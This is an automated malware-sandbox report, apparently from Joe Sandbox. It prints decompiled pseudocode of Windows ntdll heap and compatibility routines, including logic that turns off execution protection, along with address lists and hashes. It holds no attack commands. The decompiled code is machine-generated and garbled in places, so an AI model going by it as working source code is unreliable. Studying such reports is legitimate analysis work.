                                                                            												_v228 = 0;
                                                                            												if(_v248 != 0) {
                                                                            													_t282 = _t377 + 8;
                                                                            													_v308 = _t282;
                                                                            													_t343 =  *_t282;
                                                                            													_t356 = _t282[1];
                                                                            													_v328 = _t343;
                                                                            													_v324 = _t356;
                                                                            													goto L86;
                                                                            													do {
                                                                            														do {
                                                                            															L86:
                                                                            															_t380 = _t343;
                                                                            															_v272 = _t380;
                                                                            															_t371 = _t356;
                                                                            															_v380 = _t371;
                                                                            															_v328 = (_t380 + 0x00000001 ^ _t380) & 0x0000ffff ^ _t380;
                                                                            															_t379 = _v308;
                                                                            															asm("lock cmpxchg8b [esi]");
                                                                            															_t343 = _t380;
                                                                            															_v328 = _t343;
                                                                            															_t356 = _t371;
                                                                            															_v324 = _t356;
                                                                            															__eflags = _t343 - _v272;
                                                                            														} while (_t343 != _v272);
                                                                            														__eflags = _t356 - _v380;
                                                                            													} while (_t356 != _v380);
                                                                            													_v352 = 3;
                                                                            													_push(4);
                                                                            													_push( &_v352);
                                                                            													_push(9);
                                                                            													_push( *((intOrPtr*)(_t377 + 0x24)));
                                                                            													E1D8143A0();
                                                                            												} else {
                                                                            													_t288 =  *((intOrPtr*)(_t377 + 0x110));
                                                                            													if(_t288 == 0) {
                                                                            														_t288 =  *0x7ffe03c0;
                                                                            													}
                                                                            													if( *((intOrPtr*)(_t377 + 0x100)) != _t288) {
                                                                            														L1D7E2330(_t288, _t377 + 0x2c);
                                                                            														E1D8A4407(_t377);
                                                                            														E1D7E24D0(_t377 + 0x2c);
                                                                            													}
                                                                            													_t292 = _t377 + 8;
                                                                            													_v356 = _t292;
                                                                            													_t379 =  *_t292;
                                                                            													_t347 = _t292[1];
                                                                            													_v320 = _t379;
                                                                            													_v316 = _t347;
                                                                            													while(1) {
                                                                            														_t341 = _t379;
                                                                            														_v360 = _t341;
                                                                            														_t371 = _t347;
                                                                            														_v364 = _t371;
                                                                            														_t293 = _t341 & 0x0000ffff;
                                                                            														_v308 = _t293;
                                                                            														if( *((char*)(_t377 + 0xe4)) != 0) {
                                                                            															goto L67;
                                                                            														}
                                                                            														if(_t371 != 0) {
                                                                            															__eflags = _t293;
                                                                            															if(_t293 < 0) {
                                                                            																__eflags = _v261;
                                                                            																if(_v261 == 0) {
                                                                            																	goto L41;
                                                                            																}
                                                                            															}
                                                                            															_v249 = 0;
                                                                            															_v316 = _t371 - 1;
                                                                            															L42:
                                                                            															_t297 = _t341;
                                                                            															_t341 = _t379;
                                                                            															asm("lock cmpxchg8b [esi]");
                                                                            															_t379 = _t297;
                                                                            															_v320 = _t379;
                                                                            															_t347 = _t371;
                                                                            															_v316 = _t347;
                                                                            															if(_t379 != _v360 || _t347 != _v364) {
                                                                            																continue;
                                                                            															} else {
                                                                            																_t298 = _v249;
                                                                            																_v245 = _t298;
                                                                            																if(_t298 != 0) {
                                                                            																	goto L8;
                                                                            																}
                                                                            																goto L20;
                                                                            															}
                                                                            														}
                                                                            														L41:
                                                                            														_v249 = 1;
                                                                            														_t379 = (_v308 + 0x00000001 ^ _t341) & 0x0000ffff ^ _t341;
                                                                            														_v320 = _t379;
                                                                            														goto L42;
                                                                            													}
                                                                            												}
                                                                            												goto L67;
                                                                            											}
                                                                            											__eflags = _t342 - E1D7D7290;
                                                                            											if(_t342 != E1D7D7290) {
                                                                            												__eflags = _t342 - E1D7D5570;
                                                                            												if(_t342 != E1D7D5570) {
                                                                            													 *0x1d8c91e0();
                                                                            													 *_t342();
                                                                            													_v8 = 2;
                                                                            													goto L34;
                                                                            												}
                                                                            												E1D7D5570( &_v216);
                                                                            												goto L33;
                                                                            											}
                                                                            											E1D7D7290();
                                                                            											goto L33;
                                                                            										}
                                                                            										L20:
                                                                            										_push( &_v272);
                                                                            										_t371 =  &_v244;
                                                                            										_t347 = _t377;
                                                                            										if(E1D7D6970(_t377,  &_v244) == 0) {
                                                                            											goto L67;
                                                                            										}
                                                                            										if((_v84 & 0x00000001) != 0) {
                                                                            											E1D7CBE18( &_v216);
                                                                            											_v84 = _v84 & 0xfffffffe;
                                                                            										}
                                                                            										_t359 = _v272;
                                                                            										_v228 = _t359;
                                                                            										_v168 =  *((intOrPtr*)( *_t359));
                                                                            										_v164 = _t359;
                                                                            										_v144 = _v220;
                                                                            										_t360 =  *[fs:0x18];
                                                                            										_v80 =  *((intOrPtr*)(_t360 + 0xf50));
                                                                            										_v76 =  *((intOrPtr*)(_t360 + 0xf54));
                                                                            										_v72 =  *((intOrPtr*)(_t360 + 0xf58));
                                                                            										_v68 =  *((intOrPtr*)(_t360 + 0xf5c));
                                                                            										_t309 = _v220;
                                                                            										if(_t309 != 0 && ( *(_t309 + 0x10c) & 0x00000001) == 0) {
                                                                            											_t372 = _v160 | 0x00000008;
                                                                            											_v160 = _t372;
                                                                            											_t316 =  *[fs:0x18];
                                                                            											_v408 = _t316;
                                                                            											if( *((intOrPtr*)(_t316 + 0xf9c)) != 0) {
                                                                            												_t317 = 1;
                                                                            											} else {
                                                                            												_t317 = 0;
                                                                            											}
                                                                            											if(_t317 != 0) {
                                                                            												_t372 = _t372 | 0x00000004;
                                                                            												_v160 = _t372;
                                                                            											}
                                                                            											if(E1D7D6929() != 0) {
                                                                            												_v160 = _t372;
                                                                            											}
                                                                            											if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xa0)) + 0xc)) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                                                            												_v160 = _v160 | 0x00000020;
                                                                            											}
                                                                            											_t322 =  *[fs:0x18];
                                                                            											_v404 = _t322;
                                                                            											if( *((intOrPtr*)(_t322 + 0xfb8)) != 0) {
                                                                            												_v160 = _v160 | 0x00000040;
                                                                            											}
                                                                            											_t323 =  *[fs:0x18];
                                                                            											_v380 = _t323;
                                                                            											if( *((intOrPtr*)(_t323 + 0xf88)) != 0) {
                                                                            												_v160 = _v160 | 0x00000080;
                                                                            											}
                                                                            										}
                                                                            										_v8 = 8;
                                                                            										_t361 = _v272;
                                                                            										_t384 =  *((intOrPtr*)( *_t361));
                                                                            										_push(_t361);
                                                                            										_push( &_v216);
                                                                            										if(_t384 != E1D7D6B70) {
                                                                            											__eflags = _t384 - E1D7D56E0;
                                                                            											if(_t384 != E1D7D56E0) {
                                                                            												 *0x1d8c91e0();
                                                                            												 *_t384();
                                                                            											} else {
                                                                            												E1D7D56E0(_t361);
                                                                            											}
                                                                            										} else {
                                                                            											E1D7D6B70();
                                                                            										}
                                                                            										goto L33;
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            							_t268 =  *0x7ffe03c0;
                                                                            							goto L16;
                                                                            						}
                                                                            					}
                                                                            					E1D7D7F98(_t341, _t377,  &_v244, _t377, _t379, _t394);
                                                                            					_v252 = 1;
                                                                            					_t379 = _v292;
                                                                            					L1D7E2330(_t379 + 0x250, _t379 + 0x250);
                                                                            					_v8 = 4;
                                                                            					_t332 = _t379 + 0x254;
                                                                            					_t368 =  *((intOrPtr*)(_t332 + 4));
                                                                            					if( *_t368 != _t332) {
                                                                            						asm("int 0x29");
                                                                            						__eflags = _v292 + 0x250;
                                                                            						return E1D7E24D0(_v292 + 0x250);
                                                                            					}
                                                                            					_v244 = _t332;
                                                                            					_v240 = _t368;
                                                                            					_t375 =  &_v244;
                                                                            					 *_t368 = _t375;
                                                                            					 *((intOrPtr*)(_t332 + 4)) = _t375;
                                                                            					_v251 = 1;
                                                                            					_v8 = 2;
                                                                            					L71();
                                                                            					E1D818F40( &_v216, 0, 0x98);
                                                                            					_t389 = _t389 + 0xc;
                                                                            					asm("lock inc dword [edi+0xf8]");
                                                                            					_v250 = 1;
                                                                            					_t371 =  &_v44;
                                                                            					_t347 = _t377;
                                                                            					E1D7D4A09(_t377,  &_v44, 0);
                                                                            					goto L8;
                                                                            				}
                                                                            				_t339 =  *((intOrPtr*)(_t377 + 0x24));
                                                                            				_v388 = _t339;
                                                                            				_push(_t339);
                                                                            				_t340 = E1D8129A0();
                                                                            				_v276 = _t340;
                                                                            				if(_t340 < 0) {
                                                                            					goto L73;
                                                                            				}
                                                                            				asm("lock inc dword [edi]");
                                                                            				_v246 = 1;
                                                                            				goto L5;
                                                                            			}
                                                                            0x1d83083a
                                                                            0x1d830841
                                                                            0x1d830847
                                                                            0x1d830847
                                                                            0x1d7d5bd4
                                                                            0x1d7d5bda
                                                                            0x1d7d5be0
                                                                            0x1d7d5be7
                                                                            0x00000000
                                                                            0x1d7d5bed
                                                                            0x1d7d5bf3
                                                                            0x1d7d5ae0
                                                                            0x1d7d5ae0
                                                                            0x1d7d5aec
                                                                            0x1d7d5aef
                                                                            0x1d7d5af2
                                                                            0x1d7d5af5
                                                                            0x1d7d5af8
                                                                            0x1d7d5afb
                                                                            0x1d7d5b07
                                                                            0x1d7d5f69
                                                                            0x1d7d5f73
                                                                            0x1d7d5f8b
                                                                            0x1d7d5f90
                                                                            0x1d7d5f92
                                                                            0x1d83077f
                                                                            0x1d83077f
                                                                            0x1d830789
                                                                            0x1d7d5b43
                                                                            0x1d7d5b43
                                                                            0x1d7d5b49
                                                                            0x1d7d5b53
                                                                            0x1d7d5b5a
                                                                            0x1d7d5b5d
                                                                            0x1d7d5b66
                                                                            0x1d7d5b67
                                                                            0x1d7d5b6d
                                                                            0x1d7d5b6e
                                                                            0x1d7d5b74
                                                                            0x1d7d5b7a
                                                                            0x1d7d5b7b
                                                                            0x1d7d5b80
                                                                            0x1d7d5b86
                                                                            0x1d7d5b8f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d5b8f
                                                                            0x1d7d5f98
                                                                            0x1d7d5f98
                                                                            0x1d7d5f9e
                                                                            0x1d7d5fa0
                                                                            0x1d7d5fa7
                                                                            0x1d7d5fae
                                                                            0x1d7d5fb1
                                                                            0x00000000
                                                                            0x1d7d5fb1
                                                                            0x1d7d5b13
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d5b19
                                                                            0x1d7d5b30
                                                                            0x1d7d5b35
                                                                            0x1d7d5b3b
                                                                            0x1d7d5b41
                                                                            0x00000000
                                                                            0x1d7d5b41
                                                                            0x1d7d5bf9
                                                                            0x1d7d5bfe
                                                                            0x1d7d5e84
                                                                            0x1d7d5e8d
                                                                            0x1d7d5e93
                                                                            0x1d7d5ea1
                                                                            0x1d7d5ea9
                                                                            0x1d7d5eb4
                                                                            0x1d7d5eb9
                                                                            0x1d7d5ec0
                                                                            0x1d7d5ec6
                                                                            0x1d7d5ec7
                                                                            0x1d7d5ed0
                                                                            0x1d7d5ed1
                                                                            0x1d7d5ed2
                                                                            0x1d7d5ed8
                                                                            0x1d7d5f15
                                                                            0x1d7d5d52
                                                                            0x1d7d5d52
                                                                            0x1d7d5d59
                                                                            0x1d7d5d60
                                                                            0x1d830909
                                                                            0x1d830909
                                                                            0x1d7d5d6d
                                                                            0x1d7d5d74
                                                                            0x1d7d5d81
                                                                            0x1d7d5d86
                                                                            0x1d7d5d8d
                                                                            0x1d7d5d9e
                                                                            0x1d830955
                                                                            0x1d830958
                                                                            0x1d83095e
                                                                            0x1d830960
                                                                            0x1d830963
                                                                            0x1d830969
                                                                            0x1d830969
                                                                            0x1d83096f
                                                                            0x1d83096f
                                                                            0x1d83096f
                                                                            0x1d83096f
                                                                            0x1d830971
                                                                            0x1d830977
                                                                            0x1d830979
                                                                            0x1d830989
                                                                            0x1d830992
                                                                            0x1d830998
                                                                            0x1d83099c
                                                                            0x1d83099e
                                                                            0x1d8309a4
                                                                            0x1d8309a6
                                                                            0x1d8309ac
                                                                            0x1d8309ac
                                                                            0x1d8309b4
                                                                            0x1d8309b4
                                                                            0x1d8309bc
                                                                            0x1d8309c6
                                                                            0x1d8309ce
                                                                            0x1d8309cf
                                                                            0x1d8309d1
                                                                            0x1d8309d4
                                                                            0x1d7d5da4
                                                                            0x1d7d5da4
                                                                            0x1d7d5dac
                                                                            0x1d7d5f0b
                                                                            0x1d7d5f0b
                                                                            0x1d7d5db8
                                                                            0x1d8309e2
                                                                            0x1d8309e9
                                                                            0x1d8309ef
                                                                            0x1d8309ef
                                                                            0x1d7d5dbe
                                                                            0x1d7d5dc1
                                                                            0x1d7d5dc7
                                                                            0x1d7d5dc9
                                                                            0x1d7d5dcc
                                                                            0x1d7d5dd2
                                                                            0x1d7d5de0
                                                                            0x1d7d5de0
                                                                            0x1d7d5de2
                                                                            0x1d7d5de8
                                                                            0x1d7d5dea
                                                                            0x1d7d5df0
                                                                            0x1d7d5df3
                                                                            0x1d7d5e00
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d5e08
                                                                            0x1d7d5eec
                                                                            0x1d7d5eef
                                                                            0x1d8309f9
                                                                            0x1d830a00
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d830a06
                                                                            0x1d7d5ef7
                                                                            0x1d7d5f00
                                                                            0x1d7d5e29
                                                                            0x1d7d5e29
                                                                            0x1d7d5e2c
                                                                            0x1d7d5e34
                                                                            0x1d7d5e38
                                                                            0x1d7d5e3a
                                                                            0x1d7d5e40
                                                                            0x1d7d5e42
                                                                            0x1d7d5e4e
                                                                            0x00000000
                                                                            0x1d7d5e58
                                                                            0x1d7d5e58
                                                                            0x1d7d5e5e
                                                                            0x1d7d5e66
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d5e6c
                                                                            0x1d7d5e4e
                                                                            0x1d7d5e0e
                                                                            0x1d7d5e0e
                                                                            0x1d7d5e21
                                                                            0x1d7d5e23
                                                                            0x00000000
                                                                            0x1d7d5e23
                                                                            0x1d7d5de0
                                                                            0x00000000
                                                                            0x1d7d5d9e
                                                                            0x1d7d5eda
                                                                            0x1d7d5ee0
                                                                            0x1d7d5f53
                                                                            0x1d7d5f59
                                                                            0x1d7d602d
                                                                            0x1d7d6033
                                                                            0x1d7d6035
                                                                            0x00000000
                                                                            0x1d7d6035
                                                                            0x1d7d5f5f
                                                                            0x00000000
                                                                            0x1d7d5f5f
                                                                            0x1d7d5ee2
                                                                            0x00000000
                                                                            0x1d7d5ee2
                                                                            0x1d7d5c04
                                                                            0x1d7d5c0a
                                                                            0x1d7d5c0b
                                                                            0x1d7d5c11
                                                                            0x1d7d5c1a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d5c24
                                                                            0x1d7d6047
                                                                            0x1d7d604c
                                                                            0x1d7d604c
                                                                            0x1d7d5c2a
                                                                            0x1d7d5c30
                                                                            0x1d7d5c3a
                                                                            0x1d7d5c40
                                                                            0x1d7d5c4c
                                                                            0x1d7d5c52
                                                                            0x1d7d5c5f
                                                                            0x1d7d5c68
                                                                            0x1d7d5c71
                                                                            0x1d7d5c7a
                                                                            0x1d7d5c7d
                                                                            0x1d7d5c85
                                                                            0x1d7d5c9e
                                                                            0x1d7d5ca1
                                                                            0x1d7d5ca7
                                                                            0x1d7d5cad
                                                                            0x1d7d5cba
                                                                            0x1d83087c
                                                                            0x1d7d5cc0
                                                                            0x1d7d5cc0
                                                                            0x1d7d5cc0
                                                                            0x1d7d5cc4
                                                                            0x1d830886
                                                                            0x1d830889
                                                                            0x1d830889
                                                                            0x1d7d5cd1
                                                                            0x1d830897
                                                                            0x1d830897
                                                                            0x1d7d5cf0
                                                                            0x1d8308a2
                                                                            0x1d8308a2
                                                                            0x1d7d5cf6
                                                                            0x1d7d5cfc
                                                                            0x1d7d5d09
                                                                            0x1d8308ae
                                                                            0x1d8308ae
                                                                            0x1d7d5d0f
                                                                            0x1d7d5d15
                                                                            0x1d7d5d22
                                                                            0x1d8308ba
                                                                            0x1d8308ba
                                                                            0x1d7d5d22
                                                                            0x1d7d5d28
                                                                            0x1d7d5d2f
                                                                            0x1d7d5d37
                                                                            0x1d7d5d39
                                                                            0x1d7d5d40
                                                                            0x1d7d5d47
                                                                            0x1d7d5f41
                                                                            0x1d7d5f47
                                                                            0x1d7d5fc2
                                                                            0x1d7d5fc8
                                                                            0x1d7d5f49
                                                                            0x1d7d5f49
                                                                            0x1d7d5f49
                                                                            0x1d7d5d4d
                                                                            0x1d7d5d4d
                                                                            0x1d7d5d4d
                                                                            0x00000000
                                                                            0x1d7d5d47
                                                                            0x1d7d5be7
                                                                            0x1d7d5e7f
                                                                            0x1d7d5baf
                                                                            0x00000000
                                                                            0x1d7d5baf
                                                                            0x1d7d5ba1
                                                                            0x1d7d5a46
                                                                            0x1d7d5a4b
                                                                            0x1d7d5a52
                                                                            0x1d7d5a5f
                                                                            0x1d7d5a64
                                                                            0x1d7d5a6b
                                                                            0x1d7d5a71
                                                                            0x1d7d5a76
                                                                            0x1d830772
                                                                            0x1d7d6068
                                                                            0x1d7d6073
                                                                            0x1d7d6073
                                                                            0x1d7d5a7c
                                                                            0x1d7d5a82
                                                                            0x1d7d5a88
                                                                            0x1d7d5a8e
                                                                            0x1d7d5a92
                                                                            0x1d7d5a95
                                                                            0x1d7d5a9c
                                                                            0x1d7d5aa3
                                                                            0x1d7d5ab6
                                                                            0x1d7d5abb
                                                                            0x1d7d5abe
                                                                            0x1d7d5ac5
                                                                            0x1d7d5ace
                                                                            0x1d7d5ad1
                                                                            0x1d7d5ad3
                                                                            0x00000000
                                                                            0x1d7d5ad3
                                                                            0x1d7d59fe
                                                                            0x1d7d5a01
                                                                            0x1d7d5a07
                                                                            0x1d7d5a08
                                                                            0x1d7d5a0d
                                                                            0x1d7d5a15
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d5a1b
                                                                            0x1d7d5a1e
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: adf92df4145473cb5c5d2dea7c2b4d1353950f818a64a2cdd75f2fbbb0a96f38
                                                                            • Instruction ID: 8a380a75cf5a92a801d81465042b2d9ab0f5afb94a6388185ae3732ea2da5cbc
                                                                            • Opcode Fuzzy Hash: adf92df4145473cb5c5d2dea7c2b4d1353950f818a64a2cdd75f2fbbb0a96f38
                                                                            • Instruction Fuzzy Hash: BE32477490476ADFDB61CF64C884BEDBBB0BB09324F0081EAD54DA7251D774AA84CF92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: HEAP:
                                                                            • API String ID: 3446177414-2466845122
                                                                            • Opcode ID: 8eba1d52e9c7a9c61882dd0e6a22134659b24c0b2832fb5b0220bf620f766b2a
                                                                            • Instruction ID: 8e911c398b10e21cf0a88194a4cf3d883d50ca29c6b8b253dee8615159ac3d72
                                                                            • Opcode Fuzzy Hash: 8eba1d52e9c7a9c61882dd0e6a22134659b24c0b2832fb5b0220bf620f766b2a
                                                                            • Instruction Fuzzy Hash: 69A17871A083128FC705CF28C894A2BB7E5BF88A50F05456EFA46DB720E770EC45CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 63%
                                                                            			E1D807550(void* __ecx) {
                                                                            				signed int _v8;
                                                                            				char _v548;
                                                                            				unsigned int _v552;
                                                                            				unsigned int _v556;
                                                                            				unsigned int _v560;
                                                                            				char _v564;
                                                                            				char _v568;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				unsigned int _t49;
                                                                            				signed char _t53;
                                                                            				unsigned int _t55;
                                                                            				unsigned int _t56;
                                                                            				unsigned int _t65;
                                                                            				unsigned int _t66;
                                                                            				void* _t68;
                                                                            				unsigned int _t73;
                                                                            				unsigned int _t77;
                                                                            				unsigned int _t85;
                                                                            				char* _t98;
                                                                            				unsigned int _t102;
                                                                            				signed int _t103;
                                                                            				void* _t105;
                                                                            				signed int _t107;
                                                                            				void* _t108;
                                                                            				void* _t110;
                                                                            				void* _t111;
                                                                            				void* _t112;
                                                                            
                                                                            				_t45 =  *0x1d8cb370 ^ _t107;
                                                                            				_v8 =  *0x1d8cb370 ^ _t107;
                                                                            				_t105 = __ecx;
                                                                            				if( *0x1d8c6664 == 0) {
                                                                            					L5:
                                                                            					return E1D814B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
                                                                            				}
                                                                            				_t85 = 0;
                                                                            				E1D7DE580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
                                                                            				if(( *0x7ffe02d5 & 0x00000003) == 0) {
                                                                            					_t45 = 0;
                                                                            				} else {
                                                                            					_t45 =  *(_v564 + 0x5f) & 0x00000001;
                                                                            				}
                                                                            				if(_t45 == 0) {
                                                                            					_v556 = _t85;
                                                                            					_t49 = E1D807738(_t105);
                                                                            					__eflags = _t49;
                                                                            					if(_t49 != 0) {
                                                                            						L15:
                                                                            						_t103 = 2;
                                                                            						_v556 = _t103;
                                                                            						L10:
                                                                            						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
                                                                            						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
                                                                            							_t45 = 1;
                                                                            						} else {
                                                                            							_t53 = E1D80763B(_v564);
                                                                            							asm("sbb al, al");
                                                                            							_t45 =  ~_t53 + 1;
                                                                            							__eflags = _t45;
                                                                            						}
                                                                            						__eflags = _t45;
                                                                            						if(_t45 == 0) {
                                                                            							_t102 = _t103 | 0x00000040;
                                                                            							_v556 = _t102;
                                                                            						}
                                                                            						__eflags = _t102;
                                                                            						if(_t102 != 0) {
                                                                            							L33:
                                                                            							_push(4);
                                                                            							_push( &_v556);
                                                                            							_push(0x22);
                                                                            							_push(0xffffffff);
                                                                            							_t45 = E1D812B70();
                                                                            						}
                                                                            						goto L4;
                                                                            					}
                                                                            					_v552 = _t85;
                                                                            					_t102 =  &_v552;
                                                                            					_t55 = E1D8076ED(_t105 + 0x2c, _t102);
                                                                            					__eflags = _t55;
                                                                            					if(_t55 >= 0) {
                                                                            						__eflags = _v552 - _t85;
                                                                            						if(_v552 == _t85) {
                                                                            							goto L8;
                                                                            						}
                                                                            						_t85 = _t105 + 0x24;
                                                                            						E1D85EF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
                                                                            						_v560 = 0x214;
                                                                            						E1D818F40( &_v548, 0, 0x214);
                                                                            						_t106 =  *0x1d8c6664;
                                                                            						_t110 = _t108 + 0x20;
                                                                            						 *0x1d8c91e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
                                                                            						_t65 =  *((intOrPtr*)( *0x1d8c6664))();
                                                                            						__eflags = _t65;
                                                                            						if(_t65 == 0) {
                                                                            							goto L8;
                                                                            						}
                                                                            						_t66 = _v560;
                                                                            						__eflags = _t66;
                                                                            						if(_t66 == 0) {
                                                                            							goto L8;
                                                                            						}
                                                                            						__eflags = _t66 - 0x214;
                                                                            						if(_t66 >= 0x214) {
                                                                            							goto L8;
                                                                            						}
                                                                            						_t68 = (_t66 >> 1) * 2 - 2;
                                                                            						__eflags = _t68 - 0x214;
                                                                            						if(_t68 >= 0x214) {
                                                                            							E1D814C68();
                                                                            							goto L33;
                                                                            						}
                                                                            						_push(_t85);
                                                                            						 *((short*)(_t107 + _t68 - 0x220)) = 0;
                                                                            						E1D85EF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
                                                                            						_t111 = _t110 + 0x14;
                                                                            						_t73 = E1D81A9C0( &_v548, L"Execute=1");
                                                                            						_push(_t85);
                                                                            						__eflags = _t73;
                                                                            						if(_t73 == 0) {
                                                                            							E1D85EF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
                                                                            							_t106 =  &_v548;
                                                                            							_t98 =  &_v548;
                                                                            							_t112 = _t111 + 0x14;
                                                                            							_t77 = _v560 + _t98;
                                                                            							_v552 = _t77;
                                                                            							__eflags = _t98 - _t77;
                                                                            							if(_t98 >= _t77) {
                                                                            								goto L8;
                                                                            							} else {
                                                                            								goto L27;
                                                                            							}
                                                                            							do {
                                                                            								L27:
                                                                            								_t85 = E1D81A690(_t106, 0x20);
                                                                            								__eflags = _t85;
                                                                            								if(__eflags != 0) {
                                                                            									__eflags = 0;
                                                                            									 *_t85 = 0;
                                                                            								}
                                                                            								E1D85EF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
                                                                            								_t112 = _t112 + 0x10;
                                                                            								E1D84CC1E(_t105, _t106, __eflags);
                                                                            								__eflags = _t85;
                                                                            								if(_t85 == 0) {
                                                                            									goto L8;
                                                                            								}
                                                                            								_t41 = _t85 + 2; // 0x2
                                                                            								_t106 = _t41;
                                                                            								__eflags = _t106 - _v552;
                                                                            							} while (_t106 < _v552);
                                                                            							goto L8;
                                                                            						}
                                                                            						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                            						_push(3);
                                                                            						_push(0x55);
                                                                            						E1D85EF10();
                                                                            						goto L15;
                                                                            					}
                                                                            					L8:
                                                                            					_t56 = E1D807648(_t105);
                                                                            					__eflags = _t56;
                                                                            					if(_t56 != 0) {
                                                                            						goto L15;
                                                                            					}
                                                                            					_t103 = _v556;
                                                                            					goto L10;
                                                                            				} else {
                                                                            					L4:
                                                                            					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
                                                                            					goto L5;
                                                                            				}
                                                                            			}
                                                                            0x00000000
                                                                            0x1d84457c
                                                                            0x1d84457c
                                                                            0x1d844584
                                                                            0x1d844588
                                                                            0x1d84458a
                                                                            0x1d84458c
                                                                            0x1d84458e
                                                                            0x1d84458e
                                                                            0x1d84459b
                                                                            0x1d8445a0
                                                                            0x1d8445a7
                                                                            0x1d8445ac
                                                                            0x1d8445ae
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8445b4
                                                                            0x1d8445b4
                                                                            0x1d8445b7
                                                                            0x1d8445b7
                                                                            0x00000000
                                                                            0x1d8445bf
                                                                            0x1d844530
                                                                            0x1d844535
                                                                            0x1d844537
                                                                            0x1d844539
                                                                            0x00000000
                                                                            0x1d84453e
                                                                            0x1d8075e7
                                                                            0x1d8075e9
                                                                            0x1d8075ee
                                                                            0x1d8075f0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8075f2
                                                                            0x00000000
                                                                            0x1d8075a4
                                                                            0x1d8075a4
                                                                            0x1d8075a4
                                                                            0x00000000
                                                                            0x1d8075a4

                                                                            Strings
                                                                            • ExecuteOptions, xrefs: 1D8444AB
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1D84454D
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1D844460
                                                                            • Execute=1, xrefs: 1D84451E
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1D844507
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1D844530
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 1D844592
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 0-484625025
                                                                            • Opcode ID: b76cff7cab569b822c1e198df8ac75536dcbad43b4ae81a0dddb8772c9fa098b
                                                                            • Instruction ID: 2ea069d3b2960e2236862f4a8d51e120dc2a24bbe76fb7e18f826c1f40358bd6
                                                                            • Opcode Fuzzy Hash: b76cff7cab569b822c1e198df8ac75536dcbad43b4ae81a0dddb8772c9fa098b
                                                                            • Instruction Fuzzy Hash: 0F514A35A0021DBADF11AE9CEC85FFD73A8EF08310F1145E9E605A7190DB70AA45CB53
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 48%
